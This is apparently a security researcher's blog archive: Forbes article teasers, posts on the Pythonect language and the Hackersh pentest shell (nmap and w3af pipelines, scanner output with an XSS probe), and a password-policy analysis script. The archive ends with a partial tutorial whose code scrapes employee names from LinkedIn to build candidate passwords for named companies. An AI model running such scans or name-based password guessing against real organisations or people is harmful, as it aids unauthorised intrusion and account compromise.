I hack, therefore I am

Don't Let Your Fear Of Nation-State Hackers Blind You

2019-12-06T23:24:00.000+02:00

Mr. Magoo is an old cartoon character famous for his inflated sense of status and an extreme case of myopia, made worse by his refusal to wear corrective glasses. As a result of his poor vision and ego, Magoo would find himself in precarious — and hilarious — situations because he was unable to see the danger right in front of him. Typically, the oblivious Magoo would leave a trail of destruction behind him..

Enterprises today approach security a lot like Mr. Magoo, operating with the idea that they are more important than they really are and therefore are unable to see the real risks that beset them. The result? A lot of unnecessary damage.

Read the full article at Forbes here

Demystifying Criminal Hackers

2019-09-24T02:38:00.001+03:00

As I write these pieces for Forbes Tech Council, I’ve tried to chip away at the Hollywood reputation that hackers have been given over the years. That reputation often keeps people from making good decisions about how to protect their networks and data, keeps people focused on the wrong security priorities, and causes people to give up before the game is over.

It’s important to keep in mind, however, that while criminal hackers may be smart and devious, they are also, in a sense, entrepreneurs who are in the game to make a quick buck. As such, they realize that hacking costs money and so they will do what they can to keep their operating costs low. Why, then, would you expect a criminal hacker to expend time and money developing specialized tools when there are easier ways to get to what they want?

Read the full article at Forbes here

Defending Against Hacking's Long Game: It Ain't Over Till It's Over

2019-08-24T03:16:00.000+03:00

In the third quarter of Super Bowl LI, the New England Patriots trailed the Atlanta Falcons by a score of 28-3. History was against the Patriots’ chances of rallying for a comeback win. No team had ever overcome such a large deficit — especially so late in the game — to capture the NFL championship. And yet, against the odds, the Patriots stormed back to earn an improbable victory and their fifth Lombardi Trophy. Their win was the embodiment of Yogi Berra’s famous saying, “it ain’t over ‘til it’s over.” It also stands as an example for organizations fighting the good fight against hackers.

You see, hackers are persistent and patient. They know they’ll lose more often than they win, but the payoff when they do win — predicted to reach $6 trillion annually by 2021 — keeps them going. Unfortunately, we are too often blinded by short-term perspective when it comes to cyberdefense. We think that if a hacker succeeds in getting past our perimeter, we’re done for and we go into damage control mode. When we understand the way our opponent operates, however, we can shift our strategy to the long game because, as we’ve learned, there are numerous steps involved in a successful attack, and each gives us an opportunity to stop the hacker’s progress and win the game.

Read the full article at Forbes here

Advanced Persistent Threats: Calling The Hackers' Bluffs

2019-06-25T05:34:00.000+03:00

In poker, the key to success is not just about the cards you hold; it's also about the cards you can make your opponent think you hold. Effective bluffing with a weak hand is a strategy that every card sharp learns to master in order to hold a psychological edge over the adversary, as an appearance of strength can provoke poor decision making. That kind of subterfuge has played out throughout the history of warfare, as well.

The Bible recounts the story of Gideon, who, with a Hebrew force of just 300 men, routed a force of over 100,000 thanks to a bold bluff. More recently, as the allied armies prepared to liberate Europe during World War II, General George Patton was given command of a "ghost army" that fooled the Germans into thinking the landings at Normandy were not Operation Overlord’s main invasion force, delaying reinforcements while the allies

Read the full article at Forbes here

When Good Tech Goes Bad

2019-05-25T05:40:00.002+03:00

Have you ever needed to troubleshoot an issue with your computer, and your IT services pro was able to get direct access to your system from somewhere else and tackle it from their computer? While they did so, you were able to see their pointer track across the screen and go through the steps needed until ... voila! They were done, and you were back in business.

That’s a convenient ability. Giving a trusted expert direct access to your computer to take care of technical issues is a great way to facilitate IT services and quickly solve problems. That kind of support, facilitated through what is known as remote desktop protocol (RDP), has been a mainstay of technical and customer support organizations for years.

But what if that privileged access fell into the wrong hands and was abused? What if, instead of a trusted adviser, RDP was used by a criminal hacker?

Read the full article at Forbes here

Do You Do Security Due Diligence Before A Merger Or Acquisition?

2019-03-01T23:19:00.002+02:00

If a thorough cybersecurity audit isn’t a part of your mergers and acquisitions due diligence process, I think it should be. I’m not talking about the kind of halfhearted scan that checks a box for the board of directors. There’s too much at stake to do anything less than a deep examination of all network and endpoint elements that can reveal undetected compromises and lurking threats.

Global mergers and acquisitions activity in the first three quarters of 2018 was valued at $3.3 trillion. That’s a lot of capital in play, and for every deal made, the due diligence process focuses on finances and compliance to ensure that the acquiring party knows as much about the target organization as possible. Due diligence is necessary to set a fair price, protect shareholder interests and establish confidence that the purchase makes sense — or not. Due diligence also gives management a basis from which to establish a strategy for successful business and market integration.

Read the full article at Forbes here

Staying One Step Ahead Of Criminal Hackers

2018-12-12T04:44:00.003+02:00

In our efforts to stay one step ahead of the global criminal hacker cabal, my colleagues and I in the ethical hacker community try to approach our craft like our adversaries. To paraphrase Carl Spackler, we know that, in order to conquer the hacker, we have to learn to think like hackers. We’ve got to get inside the hacker’s pelt and crawl around. When you do that, you develop a begrudging respect for them.

In popular culture, however, criminal hackers can become mythologized, not unlike the way the bank robbers of old were. Despite their chosen professions, the likes of John Dillinger, Bonnie and Clyde, Baby Face Nelson and Ma Barker were sometimes regarded as modern-day Robin Hoods. They were the little guys taking on the rich and powerful with daring and panache. Even when caught, they’d often revel in the attention. When asked why he robbed banks, the infamous “Slick” Willie Sutton supposedly quipped, “Because that’s where the money is.”

That may have been true in the first half of the last century, but not anymore.

Read the full article at Forbes here

Were You Attacked Today With Yesterday's Hacking Technique?

2018-08-24T06:48:00.001+03:00

We’re all familiar with the idea of recycling as a means of reducing the waste stream. Most of us are in the habit of separating our paper, plastic, glass and metal trash from other garbage. What you may not know is that recycling is a major trend in the hacker community, too. Many of the data breaches that have struck in recent years were accomplished using software that has been around for a long time -- today’s hack, yesterday’s technique.

Tools that have been proven effective at fooling users and sneaking past network defenses are regularly reused by hackers. Whether the software was developed specifically for hacking or as a tool with a legitimate purpose that has been adapted for a less savory one, the hacker community has become expert at extracting value from what already exists. As with commercial software development, it takes time and money for hackers to write and test their code, and in order to maximize their profits, it makes sense to recycle what works. Often, these tried-and-true products are packaged and sold to others, furthering their potential to do harm.

Read the full article at Forbes here

Fixating On Vulnerabilities Is A Vulnerability

2018-06-06T04:50:00.004+03:00

You almost have to admire the hackers. Almost. Technology research firm Gartner (via Forbes) estimates that companies will spend $93 billion on cybersecurity technologies in 2018. Yet, according to a recent study by security firm Norton (via MIT Technology Review), the relentless efforts of the global hacking community still netted $172 billion in ill-gotten gains. There’s no indication that things will be any different this year. Why do the hackers continue to succeed? What must industry do to make hacking a less profitable venture for the adversary?

To better understand and answer these questions, it’s useful to examine the hackers’ successes and look for consistencies. But first, let’s define a word that is often misused or misunderstood in cybersecurity discussions: vulnerability.

Read the full article at Forbes here

The Key To Cybersecurity: Shared Intelligence And Industry Cooperation

2017-02-16T02:12:00.000+02:00

Chicago in the 1930s was a hive of organized crime where the bad guys always had the upper hand. As dramatized by the film "The Untouchables," lawman Eliot Ness confides to Officer Jim Malone that he is prepared to do “everything within the law” to take down Al Capone. But streetwise Malone tells Ness that, to win, he must be prepared to do more. “He pulls a knife, you pull a gun. He sends one of yours to the hospital, you send one of his to the morgue. That’s the Chicago way.”

Like ‘30s Chicago, the dark web is crawling with global crime syndicates, and everyone I've talked to says fighting the Chicago way sounds appealing. The problem is that the same laws that make hacking a crime also make it a crime to retaliate.

Read full article at Forbes here

Fuzzing The Kill Chain

2016-07-13T23:14:00.002+03:00

Fuzzing is a technique in software testing where you generate a number of random inputs, and see how a program handles it. So what does a testing technique have to do with a process such as the Cyber Kill Chain as developed by Lockheed Martin? Easy! Just as fuzzing a software produces resilient software, fuzzing a process will produce a validated process. The Kill Chain takes about seven steps that adversaries must complete in order to achieve their goals, but will it always be the case? Can an attacker pull off a successful attack with just one step? Or three? That’s what we’re going to fuzz out ...

(Again, in order to avoid cross-posting between the different blogs, that was just a brief paragraph and a link to the original post is below).

Continue reading: https://www.safebreach.com/blog/fuzzing-the-kill-chain

I See Your True ECHO_REQUEST Patterns (Pinging Data Away)

2015-12-02T21:55:00.001+02:00

I've started blogging again! In order to avoid cross-posting between the different blogs, I'll just give a brief paragraph and a link back to the original post. Here we go:

Getting into a network and getting data out of a network are two different challenges. Just because an employee clicked on a malicious link and got hacked, it doesn’t mean the attacker gets to walk off with PII, Financials, Source Code etc. In this blog post, we’ll explore the known breach method of using ICMP protocol for data exfiltration but with a twist. Instead of showing how to use this breach method with some custom made tools, we’re going to do it using the default and common ping utility– red team style!

Continue reading: http://blog.safebreach.com/2015/12/02/i-see-your-true-echo_request-patterns-pinging-data-away/

Pythonect Has New Graphs, Documentation, Tutorial, and More!

2013-08-07T15:08:00.000+03:00

About two weeks ago I have released a new version of Pythonect (0.6) with new features, documentation, tutorial, and an (small, but growing) example directory.
I’d like to take this opportunity to discuss the past, present and future of the Pythonect Project.

Nearly 2 years ago I started working on Pythonect with the intention to help software developers to connect the dots and make mashup, rapid prototyping, and developing scalable distributed applications easy. Pythonect is a new, experimental, general-purpose dataflow programming language based on Python. It aims to combine the intuitive feel of shell scripting (and all of its perks like implicit parallelism) with the flexibility and agility of Python. Pythonect interpreter (and reference implementation) is a free and open source software written completely in Python, and is available under the BSD 3-Clause license.

Why Pythonect? Pythonect, being a dataflow programming language, treats data as something that originates from a source, flows through a number of processing components, and arrives at some final destination. As such, it is most suitable for creating applications that are themselves focused on the "flow" of data. Perhaps the most readily available example of a dataflow-oriented applications comes from the realm of real-time signal processing, e.g. a video signal processor which perhaps starts with a video input, modifies it through a number of processing components (video filters), and finally outputs it to a video display.

As with video, many applications can be expressed as a network of different components that are connected by a number of communication channels. The benefits, and perhaps the greatest incentives, of expressing an application this way is scalability and parallelism. The different components in the network can be maneuvered to create entirely unique dataflows without necessarily requiring the relationship to be hardcoded. Also, the design and concept of components make it easier to run on distributed systems and parallel processors.

Here is the canonical "Hello, world" example program in Pythonect:

"Hello, world" -> print

And here is the canonical "Hello, world" multi-threaded example program in Pythonect:

"Hello, world" -> [print, print]

Not to mention that you can go from multi-threaded to multi-processed as easy as:

"Hello, world" -> [print &, print &]

Or remotely call a procedure using XML-RPC:

"Hello, world" -> print@xmlrpc://localhost:8081

The language couldn't possibly be simpler...
Okay, so what's new you're asking? *I was wrong*, it can be simpler, and it is in Pythonect version 0.6 :-)

In Pythonect 0.6.0 I have re-written the engine and some large parts of the backend. Pythonect is now using graph (NetworkX. DiGraph) as its data structure, and it's also supporting multiple file formats as an input. Currently, Pythonect (since version 0.6) supports 3 file formats:

*.P2Y (text-based scripting language aims to combine the quick and intuitive feel of shell scripting, with the power of Python)
*.DIA (visual programming language enabled by Dia)
*.VDX (visual programming language enabled by Microsoft Visio XML)

In other words:

is equal to:

"Hello, world" -> print

And vice versa. You can launch (almost) any graph/diagram editor and save a graph/diagram as *.VDX or *.DIA format and Pythonet will be able to parse and run it (even if it's gzipped!). Curious to see how a multi-threading/processing graph looks like? See below!

Yup, it's that simple. One node with two edges. The graph above is equal to:

"Hello, world" -> [print, print]

Which is the canonical "Hello, world" multi-threaded example program. Now, another issue that I have addressed in this release is the reduce functionally.
The famous reduce from big data. Let's say that we want to write a program that will add one to every integer input and eventually sum all the results:

[1,2,3] -> _ + 1 -> sum -> print

The above example won't work because Pythonect maps (think MapReduce) each iterable value to its own thread, so the sum function will actually receive 2, 3, 4 separately and not as a list. A workaround for this will be:

sum(`[1,2,3] -> _+1`) -> print

But with the new reduce functionally in Python 0.6, it is as easy as:

[1,2,3] -> _ + 1 -> sum(_!) -> print

By using the _! Identifier, the Pythonect interrupter will automatically join all the values (and threads/processes) into a single list and pass it to the Python function without any prerequisites. The same applies when using a graph:

is equal to:

[1,2,3] -> _ + 1 -> sum(_!) -> print

Now let's talk about the future of Pythonect. Here's a link to the TODO list, where you can find future directions. In a nutshell, more graphs, more Python implementation support, and more Service-oriented architecture (SOA).

Right now, the biggest application of Pythonect (to the best of my knowledge) is my second project, Hackersh. Hacker Shell (hackersh) is a free and open source command-line shell and scripting language designed especially for security testing. It is written in Python and uses Pythonect as its scripting engine. The upcoming release of Hackersh (work in progress!) will also enjoy the Pythonect 0.6 features such as graphs (*.VDX and *.DIA) as scripts and a better reduce functionally.

To learn more about Pythonect, please visit its homepage: http://www.pythonect.org and be sure to check out the new documentation at: http://docs.pythonect.org/en/latest/ where you can find an up-to-date tutorial and installation instructions.

That's all for now!

Hackersh 0.1 Release Announcement

2013-04-03T12:42:00.000+03:00

I am pleased to announce the Official 0.1 launch of Hackersh ("Hacker Shell") - a shell (command interpreter) written in Python with built-in security commands, and out of the box wrappers for various security tools. It uses Pythonect as its scripting engine. Since it's the first release of Hackersh, I'd like to take this opportunity to explain how it works and why you should be using it.

Hackersh is an interactive console for security research and testing. It uses Pythonect as its scripting language. Pythonect is a new, experimental, general-purpose high-level dataflow programming language based on Python. It aims to combine the intuitive feel of shell scripting (and all of its perks like implicit parallelism) with the flexibility and agility of Python. The combination of the two makes:

"http://localhost" -> url -> nmap -> w3af -> print

Return something like this:

+------------------------------------------------------------------------------+-----------------------------------------------------------------+
| VULNERABILITY DESCRIPTION                                                    | URL                                                             |
+------------------------------------------------------------------------------+-----------------------------------------------------------------+
| Cross Site Scripting was found at:                                           | http://localhost:8080/black/vulnerabilities/xss_r/              |
| "http://localhost:8080/black/vulnerabilities/xss_r/", using HTTP method GET. |                                                                 |
| The sent data was:                                                           |                                                                 |
| "name=%3CSCrIPT%3Efake_alert%28%22v3bd%22%29%3C%2FSCrIPT%3E". This           |                                                                 |
| vulnerability affects ALL browsers                                           |                                                                 |
+------------------------------------------------------------------------------+-----------------------------------------------------------------+
| The whole target has no protection (X-Frame-Options header) against          | Undefined                                                       |
| ClickJacking attack                                                          |                                                                 |
+------------------------------------------------------------------------------+-----------------------------------------------------------------+
| "X-Powered-By" header for this HTTP server is: "PHP/5.3.3-7+squeeze3"        | Undefined                                                       |
+------------------------------------------------------------------------------+-----------------------------------------------------------------+
| The server header for the remote web server is: "Apache/2.2.16 (Debian)"     | Undefined                                                       |
+------------------------------------------------------------------------------+-----------------------------------------------------------------+
| An error page sent this Apache version: "addressApache/2.2.16 (Debian)       | http://localhost:8080/black/vulnerabilities/xss_r/_vti_inf.html |
| Server at localhost Port 8080/address"                                       |                                                                 |
+------------------------------------------------------------------------------+-----------------------------------------------------------------+
| The remote Web server sent a strange HTTP response code: "405" with the      | http://localhost:8080/black/vulnerabilities/xss_r/GeBrG         |
| message: "Method Not Allowed", manual inspection is advised                  |                                                                 |
+------------------------------------------------------------------------------+-----------------------------------------------------------------+
| The remote Web server sent a strange HTTP reason message: "The HTTP server   | http://localhost:8080/black/login.php                           |
| returned a redirect error that would lead to an infinite loop. The last 30x  |                                                                 |
| error message was: Found" manual inspection is advised                       |                                                                 |
+------------------------------------------------------------------------------+-----------------------------------------------------------------+
| The remote Web server has a custom configuration, in which any non existent  | http://localhost:8080/black/vulnerabilities/xss_r/              |
| methods that are invoked are defaulted to GET instead of returning a "Not    |                                                                 |
| Implemented" response                                                        |                                                                 |
+------------------------------------------------------------------------------+-----------------------------------------------------------------+
| The URL: "http://localhost:8080/black/vulnerabilities/xss_r/" sent the       | http://localhost:8080/black/vulnerabilities/xss_r/              |
| cookie: "security=low"                                                       |                                                                 |
+------------------------------------------------------------------------------+-----------------------------------------------------------------+
| The URL: "http://localhost:8080/black/index.php" sent the cookie:            | http://localhost:8080/black/index.php                           |
| "PHPSESSID=lut893qvd4gdngp1rud5ei8pc2; path=/"                               |                                                                 |
+------------------------------------------------------------------------------+-----------------------------------------------------------------+
| A cookie matching the cookie fingerprint DB has been found when requesting   | http://localhost:8080/black/index.php                           |
| "http://localhost:8080/black/index.php" . The remote platform is: "PHP"      |                                                                 |
+------------------------------------------------------------------------------+-----------------------------------------------------------------+

So, how does it work? As a dataflow programming language, Pythonect treats data as something that originates from a source - it flows through a number of processing components and arrives at a final destination. As such, it is most suitable for creating applications that are themselves focused on the "flow" of data. Perhaps the most readily available example of a dataflow-oriented application comes from the realm of real-time signal processing, e.g. a video signal processor which starts with a video input, modifies it through a number of processing components (i.e. video filters), and finally outputs it to a video display.

As with video, penetration testing (and other security domains) can be expressed as a network of different components such as: targets, network scanners, web security scanners, etc, connected by a number of communication channels. These components (and more) are provided by Hackersh, and can be either internal (e.g. url is an internal component that converts String to URL) or external (e.g. nmap is a wrapper around the Nmap security scanner). Every Hackersh component (except the Hackersh Root Component) is standardized to accept and return a context. Context is a dict (i.e. associative array) that can be piped through different components, just like text can be piped through different Unix tools (e.g. cat, grep, wc, and etc.).

Back to real life examples, here is how you can pass command line arguments to an external Hackersh component (e.g. nmap):

"http://localhost" -> url -> nmap("-sS -P0 -T3") -> w3af -> print

Here is how you can debug a Hackersh component:

"http://localhost" -> url -> nmap("-sS -P0 -T3", debug=True) -> w3af -> print

Please note that this is not a component-specific option as almost every Hackersh component can be debugged this way.

Moving on to more advanced options:

"http://localhost" -> url -> nmap("-sS -P0 -T3") -> [_['PORT'] == '8080' and _['SERVICE'] == 'HTTP'] -> w3af -> print

Support for Metadata is a major strength of Hackersh as it enables potential AI applications to fine-tune their service selection strategy based on service-specific characteristics.

"http://localhost" -> url -> [nmap, pass] -> amap

The script above is an example for a multithreaded application. It scans http://localhost alternately, using nmap + amap and amap. The output is:

http://localhost
  +-3306/tcp (MYSQL)
  +-25/tcp (SMTP)
  +-25/tcp (NNTP)
  +-902/tcp (VMWARE-AUTHD)
  +-21/tcp (FTP)
  +-21/tcp (SMTP)
  +-22/tcp (SSH)
  +-22/tcp (SSH-OPENSSH)
  +-80/tcp (HTTP)
  +-80/tcp (HTTP-APACHE-2)
  +-80/tcp (HTTP)
  +-80/tcp (HTTP-APACHE-2)
  +-631/tcp (HTTP)
  +-631/tcp (HTTP-APACHE-2)
  +-631/tcp (HTTP-CUPS)
  +-8080/tcp (HTTP)
  +-631/tcp (SSL)
  +-8080/tcp (HTTP)
  +-8080/tcp (HTTP-APACHE-2)
  +-53/tcp (DNS)
  +-8080/tcp (HTTP-APACHE-2)
  +-2222/tcp (SSH)
  +-2222/tcp (SSH-OPENSSH)
  +-3000/tcp (HTTP)
  +-111/tcp (RPC)
  `-111/tcp (RPC-RPCBIND-V4)

To read more about Pythonect's multi-thread and multi-process capabilities, please visit Pythonect Tutorial: Learn By Example.

External Hackersh components (sorted by alphabetical order) supported in this version include:

Amap
Nbtscan
Nikto
Nmap
Ping
Sqlmap
W3af
Xprobe2

As well as the internal Hackersh components (in alphabetical order) supported in this version include:

Hostname
IPv4_Address
IPv4_Range (supports CIDR, Netmask Source-IP Notation, IP Range and etc.)
Nslookup
Stateful programmatic Web Browser (i.e. Browse, Submit, and Iterate_Links)
URL

To familiarize yourself with Pythonect, you should also read these other blog posts:

Make sure you check out these resources as well.

GitHub Issues Tracker
Twitter @hackershell

Good luck, and May the Force be with you!

Password Policy: You Are Doing It Wrong (When 2^56 Becomes 2^42)

2013-02-10T20:52:00.001+02:00

They say the road to hell is paved with good intentions. This is often the case with non-standard password policies. About a month ago I visited my "favorite airplane company" website, and after successfully logging with my Frequent Flyer credentials, I've been redirected to an Update Password page where I've been asked to change my password according to the following criteria:

Please insert an 8 characters password
The 4 first characters need to include at least 2 letters (A-Z)
The last 4 characters must be all digits

At first sight this may seem like a good password policy, 8 characters long password, must include at least 2 A-Z letters, must include at least 4 digits. But is it really going to result in a strong password?

The answer is no, and to understand why, it is necessary to understand how brute-force attack works. Brute-force attack consists of systematically trying all possible passwords until the correct password is found. In the worst case, this would involve traversing the entire search space. Now, the more search space there is, the longer (run time) it will take the brute-force to cover it. This doesn't guarantee that a given password won't be the 1st or 2nd option in the search space, but statistically speaking, if there are more options - then there are more passwords combinations to check for.

The password policy defines the search space, depending on the password policy it can either define a global search space (e.g. 8 ASCII characters password) or an individual search space per character (e.g. 8 ASCII characters password, first character must be a digit). The latter is weaker than the former. To demonstrate this, I have developed a small Python script called alphapasswd.py that calculates the search space of a password policy given it's formation and a working sample password.

#!/usr/bin/env  python

# Copyright (C) 2013 Itzik Kotler <ik@ikotler.org>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA

import sys
import re
import math


def main():

    try:

        print 'Evaluating Password Formation: "%s" with Sample Password "%s"' % (sys.argv[1], sys.argv[2])

        formation = re.compile(sys.argv[1])

        if not formation.match(sys.argv[2]):

            print 'Sample Password "%s" does not match Password Formation "%s"' % (sys.argv[2], sys.argv[1])

            return 0

        sample_passwd = list(formation.match(sys.argv[2]).group(0))

        print "INPUT: %s" % sample_passwd

        values_per_col = []

        exponent = 0

        # Itereate each Character in Sample Password

        for col_idx in xrange(0, len(sample_passwd)):

            total_values_per_col = 0

            # Itereate 2^8 Values

            for byte in xrange(0, 255):

                old_value = sample_passwd[col_idx]

                sample_passwd[col_idx] = chr(byte)

                # GO / NO GO ?

                if formation.match(''.join(sample_passwd)):

                    total_values_per_col = total_values_per_col + 1

                sample_passwd[col_idx] = old_value

            values_per_col.append(total_values_per_col)

        for col_idx in xrange(0, len(values_per_col)):

            print "PASSWORD BYTE #%d SEARCH SPACE 2^%d (%d)" % (col_idx+1, math.ceil(math.log(values_per_col[col_idx], 2)), values_per_col[col_idx])

            exponent = exponent + math.ceil(math.log(values_per_col[col_idx], 2))

        print "EXPONENT = %d" % exponent

        print "TOTAL = %d = 2^%d" % (2**exponent, exponent)

    except IndexError as e:

        print 'Missing password formation or sample password'
        print 'e.g. %s "[a-zA-Z0-9]{4}" "abcd"' % sys.argv[0]
        print 'Usage: %s <password formation> <sample password>' % sys.argv[0]


if __name__ == "__main__":
    main()

What the script above does is calculate how many bits (as eventually the password will be stored digitally and bit is the smallest unit of measurement used for information storage in computers) are needed to represent each character in the password given the password policy, and then it sums all the bits and outputs the maximum password strength (in bits) that this password policy can yield.

Going back to our original question, now that we have alphapasswd.py, it is possible to compare between two or more password policies and see which yields a better theoretical password (remember this is not testing against common passwords or obvious mistakes, just testing the search space). The second password policy that I will be using for comparecent is very similar to the one in question, but simpler, it's an 8 ASCII characters long password with no restrictions policy. Now that we have competitors, let's start measuring their search space, starting with the airplane company password policy:

./alphapasswd.py "[a-zA-Z][a-zA-Z][a-zA-Z0-9\!\@\#\$\%\^\&\*\(\)]{2}[0-9]{4}" "abcd1234"

The output should be:

Evaluating Password Formation: "[a-zA-Z][a-zA-Z][a-zA-Z0-9\!\@\#$\%\^\&\*\(\)]{2}[0-9]{4}" with Sample Password "abcd1234"
INPUT: ['a', 'b', 'c', 'd', '1', '2', '3', '4']
PASSWORD BYTE #1 SEARCH SPACE 2^6 (52)
PASSWORD BYTE #2 SEARCH SPACE 2^6 (52)
PASSWORD BYTE #3 SEARCH SPACE 2^7 (72)
PASSWORD BYTE #4 SEARCH SPACE 2^7 (72)
PASSWORD BYTE #5 SEARCH SPACE 2^4 (10)
PASSWORD BYTE #6 SEARCH SPACE 2^4 (10)
PASSWORD BYTE #7 SEARCH SPACE 2^4 (10)
PASSWORD BYTE #8 SEARCH SPACE 2^4 (10)
EXPONENT = 42
TOTAL = 4398046511104 = 2^42

From this output it is possible to see that from an 8 characters long password, the #1, #2, #5, #6, #7, and #8 bytes have a smaller search space (generally speaking the upper bounds of an ASCII byte search space is 2^7), and as a result, the maximum search space is 2^42. Now, let's try the second password policy (i.e. 8 ASCII characters long password with no restrictions):

./alphapasswd.py "[a-zA-Z0-9\!\@\#\$\%\^\&\*\(\)]{8}" "abcd1234"

The output should be:

Evaluating Password Formation: "[a-zA-Z0-9\!\@\#$\%\^\&\*\(\)]{8}" with Sample Password "abcd1234"
INPUT: ['a', 'b', 'c', 'd', '1', '2', '3', '4']
PASSWORD BYTE #1 SEARCH SPACE 2^7 (72)
PASSWORD BYTE #2 SEARCH SPACE 2^7 (72)
PASSWORD BYTE #3 SEARCH SPACE 2^7 (72)
PASSWORD BYTE #4 SEARCH SPACE 2^7 (72)
PASSWORD BYTE #5 SEARCH SPACE 2^7 (72)
PASSWORD BYTE #6 SEARCH SPACE 2^7 (72)
PASSWORD BYTE #7 SEARCH SPACE 2^7 (72)
PASSWORD BYTE #8 SEARCH SPACE 2^7 (72)
EXPONENT = 56
TOTAL = 72057594037927936 = 2^56

From this output it is possible to see that from an 8 characters long password, all the bytes have the maximum search space possible given the upper bounds of an ASCII byte search space (i.e. 2^7), and as a result, the maximum search space is 2^56. In other words, the first password policy is 16384 (i.e. 72057594037927936/4398046511104) times weaker than the second password policy. Reviewing the first password policy again, it's obiovus that the 4 digits requirement is what limits the search space the most. If so, why did my "favorite airplane company" request it? On the same Update Password page it says (on the bottom) that:

The last four characters in your password (the digits) will serve as your secret code to identify yourself at the Telephone Service Center

And so the mystery is solved, due to a legacy IVR (Interactive Voice Response), and the fact that my "favorite airplane company" did not want to seperate between their Website and IVR credentials, they composed a password security policy that is in fact weaker than an any 8 ASCII characters long password policy. Now, come to think about it, if I only need to enter 4 digits to log-in in the IVR, how are they storing the passwords then? It can't be hashed and compared as the IVR will only accept 4 digits, while the password is 8 characters long? Oh well, I guess that's a story for another day.

Scraping LinkedIn Public Profiles for Fun and Profit

2012-12-25T19:14:00.000+02:00

Reconnaissance and Information Gathering is a part of almost every penetration testing engagement. Often, the tester will only perform network reconnaissance in an attempt to disclose and learn the company's network infrastructure (i.e. IP addresses, domain names, and etc), but there are other types of reconnaissance to conduct, and no, I'm not talking about dumpster diving. Thanks to social networks like LinkedIn, OSINT/WEBINT is now yielding more information. This information can then be used to help the tester test anything from social engineering to weak passwords.

In this blog post I will show you how to use Pythonect to easily generate potential passwords from LinkedIn public profiles. If you haven't heard about Pythonect yet, it is a new, experimental, general-purpose dataflow programming language based on the Python programming language. Pythonect is most suitable for creating applications that are themselves focused on the "flow" of the data. An application that generates passwords from the employees public LinkedIn profiles of a given company - have a coherence and clear dataflow:

(1) Find all the employees public LinkedIn profiles → (2) Scrap all the employees public LinkedIn profiles → (3) Crunch all the data into potential passwords

Now that we have the general concept and high-level overview out of the way, let's dive in to the details.

Finding all the employees public LinkedIn profiles will be done via Google Custom Search Engine, a free service by Google that allows anyone to create their own search engine by themselves. The idea is to create a search engine that when searching for a given company name - will return all the employees public LinkedIn profiles. How? When creating a Google Custom Search Engine it's possible to refine the search results to a specific site (i.e. 'Sites to search'), and we're going to limit ours to: linkedin.com. It's also possible to fine-tune the search results even further, e.g. uk.linkedin.com to find only employees from United Kingdom.

The access to the newly created Google Custom Search Engine will be made using a free API key obtained from Google API Console. Why go through the Google API? because it allows automation (No CAPTCHA's), and it also means that the search-result pages will be returned as JSON (as oppose to HTML). The only catch with using the free API key is that it's limited to 100 queries per day, but it's possible to buy an API key that will not be limited.

Scraping the profiles is a matter of iterating all over the hCards in all the search-result pages, and extracting the employee name from each hCard. Whats is a hCard? hCard is a micro format for publishing the contact details of people, companies, organizations, and places. hCard is also supported by social networks such as Facebook, Google+, LinkedIn and etc. for exporting public profiles. Google (when indexing) parses hCard, and when relevant, uses them in search-result pages. In other words, when search-result pages include LinkedIn public profiles, it will appear as hCards, and could be easily parsed.

Let's see the implementation of the above:

#!/usr/bin/python
#
# Copyright (C) 2012 Itzik Kotler
#
# scraper.py is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# scraper.py is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with scraper.py.  If not, see <http://www.gnu.org/licenses/>.

"""Simple LinkedIn public profiles scraper that uses Google Custom Search"""

import urllib
import simplejson


BASE_URL = "https://www.googleapis.com/customsearch/v1?key=<YOUR GOOGLE API KEY>&cx=<YOUR GOOGLE SEARCH ENGINE CX>"


def __get_all_hcards_from_query(query, index=0, hcards={}):

    url = query

    if index != 0:

        url = url + '&start=%d' % (index)

    json = simplejson.loads(urllib.urlopen(url).read())

    if json.has_key('error'):

        print "Stopping at %s due to Error!" % (url)

        print json

    else:

        for item in json['items']:

            try:

                hcards[item['pagemap']['hcard'][0]['fn']] = item['pagemap']['hcard'][0]['title']

            except KeyError as e:

                pass

        if json['queries'].has_key('nextPage'):

            return __get_all_hcards_from_query(query, json['queries']['nextPage'][0]['startIndex'], hcards)

    return hcards


def get_all_employees_by_company_via_linkedin(company):

    queries = ['"at %s" inurl:"in"', '"at %s" inurl:"pub"']

    result = {}

    for query in queries:

        _query = query % company

        result.update(__get_all_hcards_from_query(BASE_URL + '&q=' + _query))

    return list(result)

Replace <YOUR GOOGLE API KEY> and <YOUR GOOGLE SEARCH ENGINE CX> in the code above with your Google API Key and Google Search Engine CX respectively, save it to a file called scraper.py, and you're ready!

To kick-start, here is a simple program in Pythonect (that utilizes the scraper module) that searchs and prints all the Pythonect company employees full names:

"Pythonect" -> scraper.get_all_employees_by_company_via_linkedin -> print

The output should be:

Itzik Kotler

In my LinkedIn Profile, I have listed Pythonect as a company that I work for, and since no one else is working there, when searching for all the employees of Pythonect company - only my LinkedIn profile comes up.
For demonstration purposes I will keep using this example (i.e. "Pythonect" company, and "Itzik Kotler" employee), but go ahead and replace Pythonect with other, more popular, companies names and see the results.

Now that we have a working skeleton, let's take its output and start crunching it. Keep in mind that every "password generation forumla" is merely a guess. The examples below are only a sampling of what can be done. There are, obviously many more possibilities and you are encouraged to experiment. But first, let's normalize the output - this way it's going to be consistent before operations are performed on it:

"Pythonect" -> scraper.get_all_employees_by_company_via_linkedin -> string.lower(''.join(_.split()))

The normalization procedure is short and simple: convert the string to lowercase and remove any spaces, and so the output should be now:

itzikkotler

As for data manipulation, out of the box (Thanks to The Python Standard Library) we've got itertools and it's combinatoric generators. Let's start by applying itertools.product:

"Pythonect" -> scraper.get_all_employees_by_company_via_linkedin -> string.lower(''.join(_.split())) -> itertools.product(_, repeat=4) -> print

